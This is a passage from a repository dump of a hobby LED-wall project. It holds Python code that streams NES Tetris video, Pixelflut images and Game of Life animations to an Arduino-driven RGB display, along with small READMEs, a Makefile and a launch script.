6)\n\ndef read_mode_SPI():\n (num, byte) = pi.spi_read(spi, 1)\n if num == 1:\n mode, submode = decodeByte2Mode(byte[0])\n if DEBUG_MODE:\n print(\"debug -\", \"read mode\", \"received_data:\", num, byte[0], \"received_mode:\", mode, \"received_submode:\", submode)\n return (mode, submode)\n\ndef send_SPI(data):\n if DEBUG_MODE:\n print(\"debug -\", \"sending bytes:\", len(data))\n pi.spi_write(spi, data)\n\nwhile True:\n try:\n timestart = datetime.datetime.now()\n if DEBUG_MODE:\n timeproc = timesend = timestart\n\n if DEBUG_MODE:\n print(\"debug -\", \"waiting for SPI\", \"pi.read_bank_1:\", pi.read_bank_1())\n\n while ((pi.read_bank_1() >> SYNC_PIN) & 1) != 1:\n pass # just wait, until the sync pin is set\n\n if DEBUG_MODE:\n print(\"debug - got SPI\")\n\n if ((pi.read_bank_1() >> SYNC_PIN) & 1) == 1:\n\n #(new_mode, new_submode) = request_mode_SPI()\n #time.sleep(0.001)\n (new_mode, new_submode) = read_mode_SPI()\n\n is_modes_changed = True\n if mode == new_mode and submode[mode] == new_submode:\n is_modes_changed = False\n if DEBUG_MODE:\n print(\"debug -\", \"change:\", is_modes_changed, \"new_mode:\", new_mode, \"new_submode:\", new_submode, \"prev_mode:\", mode, \"prev_submode:\", submode[mode])\n else:\n if (is_first_loop): #just for logging\n is_first_loop = False\n print(\"first read mode byte from arduino -\", \"new_mode:\", new_mode, \"new_submode:\", new_submode)\n\n mode = new_mode\n submode[mode] = new_submode\n\n\n if (mode == 4): # mode for stream of beat-patterns\n\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n #TODO calculate LEDS\n leds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n elif (mode == 3): #mode for stream from NES/video\n\n \"\"\" in the NES mode the new frame needs to get determined \n WHILE the arduino is writing the old frame to the leds\n in order to parallelise these two expensive computations\n and meet the speed requirements of max 40ms per frame \"\"\"\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n if not is_modes_changed:\n # last turn the mode was the same, thus the calculated frame should be valid\n\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n #decode pixels from 24-bit into 6-bit (64-colour palette)\n #data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n #data_dec = base64.b64decode(data_b64)\n #print(\"debug -\", \"len(data_b64):\", len(data_b64), \"data_b64:\", data_b64)\n #print(\"debug -\", \"len(data_dec):\", len(data_dec), \"data_dec:\", data_dec)\n send_SPI(data_enc)\n\n # calculate new frame:\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n #TODO: needs debugging!\n # if is_modes_changed:\n # if submode[1] == 1:\n # strmnes = StreamNES(_ntsc=False)\n # else:\n # strmnes = StreamNES(_ntsc=True)\n\n leds = strmnes.read_frame()\n\n if DEBUG_MODE:\n print(\"debug -\", \"leds:\", leds.shape)\n\n\n elif (mode == 2): #mode for pixelflut\n\n \"\"\" TODO documentation \"\"\"\n\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n\n if not is_modes_changed:\n data_enc = leds.flatten().tobytes()\n #data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n leds = pixelflut_read()\n\n\n elif (mode == 1): # mode for stream of images\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n\n now = datetime.datetime.now()\n #if is_modes_changed or ((now - time_last_istream_change).seconds + (now - time_last_istream_change).microseconds*0.000001 > waittime_until_next_image):\n if is_modes_changed or (next_image_counter >= (threshold_until_next_image - 1)):\n \"\"\" \n if DEBUG_MODE:\n print(\"debug -\", \"new image:\", submode[1],\n \"last_image_t:\", \"{0:.2f}\".format(round((now - time_last_istream_change).seconds * 1000 + (now - time_last_istream_change).microseconds / 1000, 2)),\n \"wait_next_image_t:\", \"{0:.2f}\".format(\n round(waittime_until_next_image * 1000, 2)),\n \"(ms)\")\n \"\"\"\n if DEBUG_MODE:\n print(\"debug -\", \"new image:\", submode[1],\n \"counter:\", next_image_counter)\n if submode[1] == 0:\n leds = iloader.load_random_image()\n else:\n leds = iloader.load_numbered_image(submode[1])\n #time_last_istream_change = datetime.datetime.now()\n next_image_counter = 0\n else:\n next_image_counter += 1\n\n if DEBUG_MODE:\n print(\"debug -\", \"leds:\", leds.shape)\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n else: #mode == 0 # no stream\n if DEBUG_MODE:\n timeproc = datetime.datetime.now()\n if DEBUG_MODE:\n print(\"debug -\", \"Nothing to see here\")\n pass\n leds = np.zeros((NUM_LEDS_H, NUM_LEDS_V, 3), dtype='uint8')\n if DEBUG_MODE:\n timesend = datetime.datetime.now()\n data_enc = leds.transpose(1, 0, 2).flatten().tobytes()\n send_SPI(data_enc)\n\n\n timefin = datetime.datetime.now()\n waittime = max(0.0, (POLL_GRACE_PERIOD) - ((timefin - timestart).microseconds*0.000001 + (timefin - timestart).seconds))\n\n if DEBUG_MODE:\n\n if timeproc > timesend:\n handshake_delta_t = (timesend - timestart).microseconds/1000 + (timesend - timestart).seconds*1000\n send_delta_t = (timeproc - timesend).microseconds/1000 + (timeproc - timesend).seconds*1000\n proc_delta_t = (timefin - timeproc).microseconds/1000 + (timefin - timeproc).seconds*1000\n else:\n handshake_delta_t = (timeproc - timestart).microseconds/1000 + (timeproc - timestart).seconds*1000\n proc_delta_t = (timesend - timeproc).microseconds/1000 + (timesend - timeproc).seconds*1000\n send_delta_t = (timefin - timesend).microseconds/1000 + (timefin - timesend).seconds*1000\n\n print(\"debug -\", \"arduino mode:\", mode, \"submode:\", submode[mode],\n \"handshake_t:\", \"{0:.2f}\".format(round(handshake_delta_t,2)),\n \"process_t:\", \"{0:.2f}\".format(round(proc_delta_t,2)),\n \"send_t:\", \"{0:.2f}\".format(round(send_delta_t,2)),\n \"wait_t:\", \"{0:.2f}\".format(round(waittime*1000,2)),\n \"(ms)\")\n\n time.sleep(waittime)\n except KeyboardInterrupt:\n break\n\nif DEBUG_MODE:\n print(\"debug -\", \"raspberry PI preprocessing - closing\")\n\ntime.sleep(0.2)\npi.spi_close(spi)\ntime.sleep(0.2)\npi.stop()\n\n" }, { "alpha_fraction": 0.4424371123313904, "alphanum_fraction": 0.5074743032455444, "avg_line_length": 36.24010467529297, "blob_id": "a7e4b95064cf59bee437486c16df67b0467183c5", "content_id": "105f8397c95c70a2a8101a48f7a64c338e6589af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14115, "license_type": "no_license", "max_line_length": 143, "num_lines": 379, "path": "/raspi_preproc/nes_tetris.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "from PIL import Image\nfrom PIL import ImageFilter\nfrom PIL import ImageEnhance\n\n_FORMAT = \"RGB\" #HSV\n_COLOR_ENHANCE_FACTOR = 3.0\n\n\nclass NesTetris:\n\n\n #def __init__(self, _num_leds_h=16, _num_leds_v=24, _gray=(95, 7, 128)): #RGB\n def __init__(self, _num_leds_h=16, _num_leds_v=24, _gray=(116, 116, 108)): #HSV\n\n self.num_h = _num_leds_h\n self.num_v = _num_leds_v\n self.gray = _gray\n self.black = (0, 0, 0)\n\n self.hsv_pixel = Image.new(\"HSV\", (1, 1), 0) # for the score rainbow\n self.img_leds = Image.new(_FORMAT, (_num_leds_h, _num_leds_v), 0)\n #print(\"debug -\", \"leds_init:\", np.array(self.img_leds, dtype=np.uint8).shape)\n\n # frame play area\n for y in range(2, 24):\n self.img_leds.putpixel((0, y), _gray)\n self.img_leds.putpixel((11, y), _gray)\n for x in range(0, 12):\n self.img_leds.putpixel((x, 2), _gray)\n self.img_leds.putpixel((x, 23), _gray)\n\n # frame next block area\n for x in range(12, 16):\n self.img_leds.putpixel((x, 10), _gray)\n self.img_leds.putpixel((x, 15), _gray)\n # score/lines/level areas\n for x in range(12, 16):\n self.img_leds.putpixel((x, 2), _gray)\n self.img_leds.putpixel((x, 23), _gray)\n\n return\n\n\n def reset_areas(self):\n # play area\n for y in range(3, 23):\n for x in range(1, 11):\n self.img_leds.putpixel((x, y), self.black)\n # next block area\n for y in range(11, 15):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n # lines areas\n for y in range(3, 10):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n # level areas\n for y in range(16, 23):\n for x in range(12, 16):\n self.img_leds.putpixel((x, y), self.black)\n\n return\n\n\n def enhance_image(self, img):\n converter = ImageEnhance.Color(img)\n return converter.enhance(_COLOR_ENHANCE_FACTOR)\n\n\n def is_pix_white(self, pix):\n if (pix[0] >= 128) and (pix[1] >= 128) and (pix[2] >= 128): #RGB\n #if (pix[2]) >= 128: #HSV\n return True\n return False\n\n\n def is_pix_black(self, pix):\n if (pix[0] < 48) and (pix[1] < 48) and (pix[2] < 48): #RGB\n #if (pix[2]) < 48: #HSV\n return True\n return False\n\n\n def get_number(self, img):\n #img.convert(\"RGB\").save(\"debug2.png\", \"PNG\")\n number = 0\n\n #read\n if not self.is_pix_white(img.getpixel((12, 3))):\n if self.is_pix_white(img.getpixel((2, 2))):\n if self.is_pix_white(img.getpixel((17, 2))):\n number = 7\n else:\n number = 5\n elif self.is_pix_white(img.getpixel((2, 9))):\n if self.is_pix_white(img.getpixel((17, 6))):\n number = 8\n else:\n number = 6\n else:\n if self.is_pix_white(img.getpixel((17, 14))):\n number = 2\n else:\n number = 9\n else:\n if self.is_pix_white(img.getpixel((12, 12))):\n if self.is_pix_white(img.getpixel((17, 14))):\n number = 1\n else:\n number = 4\n else:\n if self.is_pix_white(img.getpixel((17, 2))):\n number = 3\n else:\n number = 0\n\n #print(\"debug number:\", str(number))\n\n return number\n\n\n def test_pixel(self, img, x, y, is_white=True):\n pix = img.getpixel((x, y))\n if is_white:\n return self.is_pix_white(pix)\n else:\n return self.is_pix_black(pix)\n\n\n # def get_enhanced_pixel(self, img, x, y):\n # img_pix = self.enhance_image(img.crop((x, y, x+1, y+1)))\n # return img_pix.getpixel((0, 0))\n\n\n def test_tetris_runnig(self, img):\n # if not self.test_pixel(img, 54, 59, is_white=False):\n # return False\n # if not self.test_pixel(img, 197, 142, is_white=False):\n # return False\n # if not self.test_pixel(img, 484, 350, is_white=False):\n # return False\n # if not self.test_pixel(img, 536, 101, is_white=False):\n # return False\n # if not self.test_pixel(img, 546, 321, is_white=True):\n # return False\n # if not self.test_pixel(img, 370, 53, is_white=True):\n # return False\n # if not self.test_pixel(img, 67, 154, is_white=True):\n # return False\n # if not self.test_pixel(img, 109, 387, is_white=True):\n # return False\n if not self.test_pixel(img, 54, 59, is_white=False):\n return False\n if not self.test_pixel(img, 197, 142, is_white=False):\n return False\n if not self.test_pixel(img, 484, 350, is_white=False):\n return False\n if not self.test_pixel(img, 536, 101, is_white=False):\n return False\n if not self.test_pixel(img, 567, 330, is_white=True):\n return False\n if not self.test_pixel(img, 370, 54, is_white=True):\n return False\n if not self.test_pixel(img, 67, 144, is_white=True):\n return False\n if not self.test_pixel(img, 109, 387, is_white=True):\n return False\n # if not self.is_pix_black(img.getpixel((54, 59))):\n # return False\n # if not self.is_pix_black(img.getpixel((197, 142))):\n # return False\n # if not self.is_pix_black(img.getpixel((484, 350))):\n # return False\n # if not self.is_pix_black(img.getpixel((536, 101))):\n # return False\n # if not self.is_pix_white(img.getpixel((546, 321))):\n # return False\n # if not self.is_pix_white(img.getpixel((370, 53))):\n # return False\n # if not self.is_pix_white(img.getpixel((67, 154))):\n # return False\n # if not self.is_pix_white(img.getpixel((109, 387))):\n # return False\n\n return True\n\n\n def extract_game_area(self, im, area=None, ntsc=True):\n if ntsc:\n if area is None:\n area = (43, 0, 43 + 642, 0 + 478)\n else:\n if area is None:\n area = (41, 42, 41 + 642, 42 + 478)\n return im.crop(area)\n\n\n def extract_colours(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #img = self.enhance_image(img)\n\n for y in range(20):\n for x in range(10):\n at = (1 + x * 20 + 10, 1 + y * 16 + 9)\n if not self.is_pix_black(img.getpixel(at)):\n pix = img.getpixel(at)\n else:\n pix = self.black\n self.img_leds.putpixel((1 + x, 3 + y), pix)\n\n return\n\n\n def extract_next_block(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #img = self.enhance_image(img)\n\n #read\n if not self.is_pix_black(img.getpixel((5, 18))):\n next_block = 6\n next_block_col = img.getpixel((5, 18))\n elif not self.is_pix_black(img.getpixel((15, 9))):\n if not self.is_pix_black(img.getpixel((35, 26))):\n if not self.is_pix_black(img.getpixel((55, 9))):\n next_block = 0\n else:\n next_block = 2\n else:\n if not self.is_pix_black(img.getpixel((15, 26))):\n next_block = 5\n else:\n next_block = 1\n next_block_col = img.getpixel((15, 9))\n else:\n if not self.is_pix_black(img.getpixel((62, 10))):\n next_block = 4\n next_block_col = img.getpixel((62, 10))\n else:\n next_block = 3\n next_block_col = img.getpixel((50, 9))\n\n #write\n for x in range(0, 4):\n self.img_leds.putpixel((12+x, 12), self.black)\n self.img_leds.putpixel((12+x, 13), self.black)\n if next_block == 0:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((13, 13), next_block_col)\n elif next_block == 1:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((14, 13), next_block_col)\n elif next_block == 2:\n for x in range(0, 2):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((13+x, 13), next_block_col)\n elif next_block == 3:\n for x in range(0, 2):\n self.img_leds.putpixel((13+x, 12), next_block_col)\n self.img_leds.putpixel((13+x, 13), next_block_col)\n elif next_block == 4:\n for x in range(0, 2):\n self.img_leds.putpixel((13+x, 12), next_block_col)\n self.img_leds.putpixel((12+x, 13), next_block_col)\n elif next_block == 5:\n for x in range(0, 3):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n self.img_leds.putpixel((12, 13), next_block_col)\n else: #next_block == 6:\n for x in range(0, 4):\n self.img_leds.putpixel((12+x, 12), next_block_col)\n\n\n def extract_score(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n score = 0 \\\n + 100000 * self.get_number(img.crop((1, 0, 1 + 20, 16))) \\\n + 10000 * self.get_number(img.crop((21, 0, 21 + 20, 16))) \\\n + 1000 * self.get_number(img.crop((41, 0, 41 + 20, 16))) \\\n + 100 * self.get_number(img.crop((62, 0, 62 + 20, 16))) \\\n + 10 * self.get_number(img.crop((82, 0, 82 + 20, 16))) \\\n + self.get_number(img.crop((102, 0, 102 + 20, 16)))\n\n #write\n for i in range(max(int(score/10000), 0), 32):\n self.img_leds.putpixel((0 + int(i/2), 0 + i%2), self.black)\n for i in range(min(int(score/10000), 32)):\n self.hsv_pixel.putpixel((0, 0), (max(186-i*6, 0), 255, 128))\n self.img_leds.putpixel((0 + int(i/2), 0 + i%2), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #\"self.img_leds.putpixel((0 + int(i/2), 0 + i%2), (max(186-i*6, 0), 255, 128))\n\n #print(\"debug score\", score)\n\n\n def extract_level(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n level = 0 \\\n + 10 * self.get_number(img.crop((0, 0, 20, 16))) \\\n + self.get_number(img.crop((20, 0, 40, 16)))\n #write\n for i in range(max(level, 0), 28):\n self.img_leds.putpixel((12 + int(i/7), 16 + i%7), self.black)\n for i in range(min(level+1,28)):\n self.hsv_pixel.putpixel((0, 0), (max(180-i*6, 0), 255, 128))\n self.img_leds.putpixel((12 + int(i/7), 16 + i%7), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #self.img_leds.putpixel((12 + int(i/7), 16 + i%7), (max(180-i*6, 0), 255, 128))\n\n #print(\"debug level\", level)\n\n\n def extract_lines(self, img):\n #img.convert(\"RGB\").save(\"debug.png\", \"PNG\")\n #read\n lines = 0 \\\n + 100 * self.get_number(img.crop((1, 0, 20, 16))) \\\n + 10 * self.get_number(img.crop((21, 0, 41, 16))) \\\n + self.get_number(img.crop((41, 0, 61, 16)))\n #write\n for i in range(max(int(lines/10), 0), 28):\n self.img_leds.putpixel((12 + int(i/7), 3 + i%7), self.black)\n for i in range(min(int(lines/10)+1, 28)):\n self.hsv_pixel.putpixel((0, 0), (max(180-i*6, 0), 255, 128))\n self.img_leds.putpixel((12 + int(i/7), 3 + i%7), self.hsv_pixel.convert(_FORMAT).getpixel((0,0)))\n #self.img_leds.putpixel((12 + int(i/7), 3 + i%7), (max(180-i*6, 0), 255, 128))\n\n #print(\"debug lines\", lines)\n\n\n def transform_frame(self, img):\n # check if game is running\n if not self.test_tetris_runnig(img):\n self.reset_areas()\n return self.img_leds\n\n # play area\n #self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)).convert(\"HSV\").filter(ImageFilter.SMOOTH))\n self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)).filter(ImageFilter.SMOOTH))\n #self.extract_colours(img.crop((239, 93, 240 + 10 * 20, 94 + 20 * 16)))\n\n # next block\n self.extract_next_block(img.crop((482, 237, 482 + 81, 237 + 33)).filter(ImageFilter.SMOOTH))\n #self.extract_next_block(img.crop((482, 237, 482 + 81, 237 + 33)))\n\n # number of lines\n self.extract_lines(img.crop((380, 45, 380 + 61, 45 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_lines(img.crop((380, 45, 380 + 61, 45 + 16)))\n\n # score\n self.extract_score(img.crop((481, 125, 481 + 122, 125 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_score(img.crop((481, 125, 481 + 122, 125 + 16)))\n\n # number of level\n self.extract_level(img.crop((522, 333, 522 + 40, 333 + 16)).filter(ImageFilter.SMOOTH))\n #self.extract_level(img.crop((522, 333, 522 + 40, 333 + 16)))\n\n #return self.img_leds\n return self.enhance_image(self.img_leds)\n\n\n#for debug\nimport numpy as np\nimport time\nimport datetime\n\nif __name__ == \"__main__\":\n im = Image.open(\"nes_cut.png\").convert(_FORMAT)\n gray = im.getpixel((6,6))\n print(\"debug gray\", gray)\n game = NesTetris(_gray=gray)\n for n in range(5):\n timestart = datetime.datetime.now()\n leds = game.transform_frame(im).convert(\"RGB\")\n timefin = datetime.datetime.now()\n print(\"leds\", np.array(leds, dtype=np.uint8).shape, \"transform_t: {ptime} in ms\".format(ptime=(timefin-timestart).microseconds / 1000))\n leds.save(\"leds.png\", \"PNG\")\n im.convert(\"RGB\").save(\"debug1.png\", \"PNG\")\n\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7386363744735718, "avg_line_length": 18.44444465637207, "blob_id": "6d5d332b3072fb3a8700bac57fa2d66742e5ee36", "content_id": "1e9cacefbb4c36acc48459ca00c840ab0923646a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 176, "license_type": "no_license", "max_line_length": 65, "num_lines": 9, "path": "/raspi_preproc/workbench/streaming/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\nRun\n\n . ../envs/tetris-wall-rgb/bin/activate\n python stream.py\n\nCurrently there is a caveat where you need to stream with mplayer\nonce to make capturing work:\n\n\tmake play\n" }, { "alpha_fraction": 0.5476772785186768, "alphanum_fraction": 0.5678483843803406, "avg_line_length": 18.710844039916992, "blob_id": "345f7d5d8be23435e93c3b39328b0189cd683118", "content_id": "d326ccb334e32f86980d1dadb07d397ecbdc47c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1636, "license_type": "no_license", "max_line_length": 71, "num_lines": 83, "path": "/pixelflut/canvas_brain.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import logging\nlog = logging.getLogger('brain')\n\nlog.debug('lol')\n\nticks = 0\n\n\n@on('RESIZE')\ndef resize(canvas):\n global log\n log.debug('resize event')\n\n\n@on('QUIT')\ndef quit(canvas):\n global log\n log.debug('quit event')\n\n\n@on('TICK')\ndef tick(canvas):\n global log\n global ticks\n if ticks % 50 == 0:\n print('.')\n ticks += 1\n\n\n@on('CONNECT')\ndef connect(canvas, client):\n global log\n log.debug('connect event %s', client)\n\n\n@on('DISCONNECT')\ndef disconnect(canvas, client):\n global log\n log.debug('disconnect event %s', client)\n\n\n@on('COMMAND-PX')\ndef command_px(canvas, client, *args):\n global log\n log.debug('px command event %s %s', client, args)\n assert len(args) == 3\n\n x, y, c = args\n c = c.lower().strip('#')\n\n assert x.isdecimal()\n assert y.isdecimal()\n assert 6 <= len(c) <= 8\n\n # pad optional alpha\n c += 'f' * (8 - len(c))\n\n x, y = int(x), int(y)\n r, g, b, a = tuple(int(c[i:i+2], 16) for i in (0, 2, 4, 6))\n\n canvas.set_pixel(x, y, r, g, b, a)\n return True\n\n\n@on('COMMAND-WL')\ndef command_wl(canvas, client, *args):\n import base64\n global log\n log.debug(\"wl command event %s %d args\", client, len(args))\n w, h = canvas.size\n raw_size = w * h * canvas.depth\n b64_size = int(raw_size + raw_size/3)\n assert len(args) == 1\n base = args[0]\n assert len(base) == b64_size\n data = base64.b64decode(base)\n assert len(data) == w * h * canvas.depth\n\n for y in range(h):\n for x in range(w):\n p = (y*w + x) * 3\n canvas.set_pixel(x, y, data[p], data[p+1], data[p+2], 0xff)\n return True\n" }, { "alpha_fraction": 0.6779661178588867, "alphanum_fraction": 0.7740113139152527, "avg_line_length": 58, "blob_id": "d9e64f6199fd5ae46df2d368baf9bd707ced7a1d", "content_id": "ae39b5fb4462df922cec030196423fc4fab3e760", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 177, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/raspi_preproc/workbench/streaming/Makefile", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "play:\n\tmplayer tv:// -tv driver=v4l2:norm=PAL:width=720:height=576:outfmt=uyvy:device=/dev/video0:input=0:\\\nalsa:adevice=hw.1:audiorate=48000:forceaudio:immediatemode=0 -ao sdl\n" }, { "alpha_fraction": 0.4587155878543854, "alphanum_fraction": 0.6788991093635559, "avg_line_length": 14.571428298950195, "blob_id": "cff2e198d9170fd9b18f0ba29cd07f9b50075f7e", "content_id": "70c9a50a3cd835569802947dc23c4f4bf812e9bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 109, "license_type": "no_license", "max_line_length": 20, "num_lines": 7, "path": "/pixelflut/requirements.txt", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "gevent==1.3.6\ngreenlet==0.4.15\nnumpy==1.15.2\npigpio==1.41\npkg-resources==0.0.0\npycairo==1.17.1\npygame==1.9.4\n" }, { "alpha_fraction": 0.7473118305206299, "alphanum_fraction": 0.7634408473968506, "avg_line_length": 30, "blob_id": "eae72862876a54f0db00f50541184298a7e7f6c5", "content_id": "fe44b831e36632809c6efa4816c1deaf5b4345b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 186, "license_type": "no_license", "max_line_length": 68, "num_lines": 6, "path": "/run_preproc.sh", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "#!/bin/sh\n# run the whole raspi proprocessing pipeline for teh rgb-tetris-wall\n\ncd /home/pi/rgb-tetris-wall/raspi_preproc/\n. /home/pi/env/bin/activate\nDISPLAY=:0.0 python3 controller.py\n" }, { "alpha_fraction": 0.5748792290687561, "alphanum_fraction": 0.6367149949073792, "avg_line_length": 35.48214340209961, "blob_id": "c864517071fc2abe35e483c355b03b343419ed76", "content_id": "bf41c07b91c786f9131c7c5bda1c3f74545a1c91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2070, "license_type": "no_license", "max_line_length": 242, "num_lines": 56, "path": "/raspi_preproc/workbench/send_serial.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "import serial\nimport time\nimport datetime\nimport base64\nimport os\nUSBPORT = os.environ.get(\"USBPORT\", '/dev/ttyACM0') #check correct port first\n#USBPORT = '/dev/ttyAMA0' #check correct port first\n#USBPORT = 'COM3' #check correct port first\nNUM_LEDS_H = 16 #16\nNUM_LEDS_V = 24 #24\nFPS = 25\nWAITTIME_VSTREAM = float(os.environ.get('WAITTIME_VSTREAM', '0.040')) #40 ms\nWAITTIME_ISTREAM = 1.0 #40 ms\n\nb64dict = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'\n\ns = serial.Serial(USBPORT, 115200*3) #57600 dc115200 230400\ntime.sleep(2)\n\nleds = [[0 for i in range(NUM_LEDS_V)] for j in range(NUM_LEDS_H)]\ncounter = 0\ndelaycounter = 1\ndelay = 1 #FPS 1 for testing\ndata_read = 0\n\nprint(\"Start sending\")\nwhile True:\n timestart = datetime.datetime.now()\n\n data_read = int(s.read(1))\n # mode - video stream: 25 frames per second with 6 bit/px\n if (data_read==3):\n data_prep_start = datetime.datetime.now()\n for i in range(NUM_LEDS_H):\n for j in range(NUM_LEDS_V):\n leds[i][j] = (4*(counter-i+j))%64\n #leds[i][j] = 256//NUM_LEDS_V*((counter+i+j)%NUM_LEDS_V)\n #leds[i][j] = 63\n if (delaycounter%delay == 0):\n counter=(counter+1)%NUM_LEDS_H\n delaycounter=(delaycounter+1)%delay\n\n data_b64 = ''.join(b64dict[m] for n in leds for m in n)\n data_dec = base64.b64decode(data_b64)\n #print(len(data_b64),data_b64)\n #print(len(data_dec),data_dec)\n\n data_send_start = datetime.datetime.now()\n s.write(data_dec)\n #s.write(bytes([m for n in leds for m in n])) #undecoded format\n s.flush()\n \n timefin = datetime.datetime.now()\n waittime = max(0.0,(WAITTIME_VSTREAM)-(0.000001*(timefin-timestart).microseconds))\n print(\"arduino_mode:\",data_read,\"prep_t:\", 0.000001*(data_send_start-data_prep_start).microseconds, \"write_t:\", 0.000001*(timefin-data_send_start).microseconds, \"process_t:\", 0.000001*(timefin-timestart).microseconds, \"wait_t:\", waittime)\n time.sleep(waittime) \n\n\n\n" }, { "alpha_fraction": 0.7497206926345825, "alphanum_fraction": 0.7519553303718567, "avg_line_length": 34.79999923706055, "blob_id": "35be10e93201b9ab92053047c7e781cb2e27e2ab", "content_id": "a3ace8ac73b6957d22b099281a272b300d9bfed0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 895, "license_type": "no_license", "max_line_length": 75, "num_lines": 25, "path": "/reels/README.md", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "# LED Wall Reels\nReels are scripts that create animations for the LED Wall. Images are sent \nusing our extended Pixelflut protocol (that has an additional command to \nsend the whole content for the wall in one go in about 1.6kB).\n\nA module named `fluter` is provided to make it dead easy to write reels;\njust import the function you need from `fluter` and send pixels, \nPIL-images, RAW-RGB-image-bytestrings, or arrays (numpy or native).\n\nLook at the basic examples, like `randimg.py` or `gol.py`, to find out \nhow to use the module.\n\n# Run reels on your PC\nCreate venv for the pixelflut script (see directory `pixelflut`) and \nstart it in canvas mode:\n\n $ python pixelflut.py canvas_brain.py\n\nIn a second terminal enter the `reels` directory and run whatever reel \nyou like, e.g. \n\n $ python wator.py\n\nThat's it, basically. You should see the animation of the reel in the \npygame window.\n" }, { "alpha_fraction": 0.463609904050827, "alphanum_fraction": 0.49563318490982056, "avg_line_length": 18.898550033569336, "blob_id": "35c0a39429212925063ac337bac0d2a491d12e05", "content_id": "5b798452df9eff23f28493b1c80f4ccf3633c3ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1374, "license_type": "no_license", "max_line_length": 77, "num_lines": 69, "path": "/reels/gol.py", "repo_name": "deepestcyber/rgb-tetris-wall", "src_encoding": "UTF-8", "text": "\"\"\"\nRGB-Reel Conway's Game of Life\n\nSimple implementation of Conway's Game of Life as reel for your wall. Runs in\na torus world and get's initialized randomly.\n\nSee https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n\ncreated by kratenko\n\"\"\"\nimport numpy as np\nimport time\nfrom fluter import Fluter\n\nfluter = Fluter()\n\nw = 16\nh = 24\n\nglider = [[1, 0, 0],\n [0, 1, 1],\n [1, 1, 0]]\n\nf = np.random.randint(2, size=(h, w), dtype=np.uint8)\n#f = np.zeros((h, w), dtype=np.uint8)\n#f[:3, :3] = glider\n\n\ndef neigh(f, pos):\n x, y = pos\n xa = (x - 1) % w\n xb = x\n xc = (x + 1) % w\n ya = (y - 1) % h\n yb = y\n yc = (y + 1) % h\n n = 0\n n += f[ya, xa] + f[ya, xb] + f[ya, xc]\n n += f[yb, xa] + 0 + f[yb, xc]\n n += f[yc, xa] + f[yc, xb] + f[yc, xc]\n return n\n\n\ndef next_gen(fin):\n fout = fin.copy()\n for y in range(h):\n for x in range(w):\n n = neigh(fin, (x, y))\n if fin[y, x]:\n fout[y, x] = 1 if 1 < n < 4 else 0\n else:\n fout[y, x] = 1 if n == 3 else 0\n return fout\n\n\ndef to_raw(fin):\n dead = b\"\\x00\\x00\\x80\"\n live = b\"\\x00\\xff\\x00\"\n d = []\n for y in range(h):\n for x in range(w):\n d += [live] if f[y, x] else [dead]\n return b\"\".join(d)\n\n\nwhile True:\n fluter.send_raw(to_raw(f))\n f = 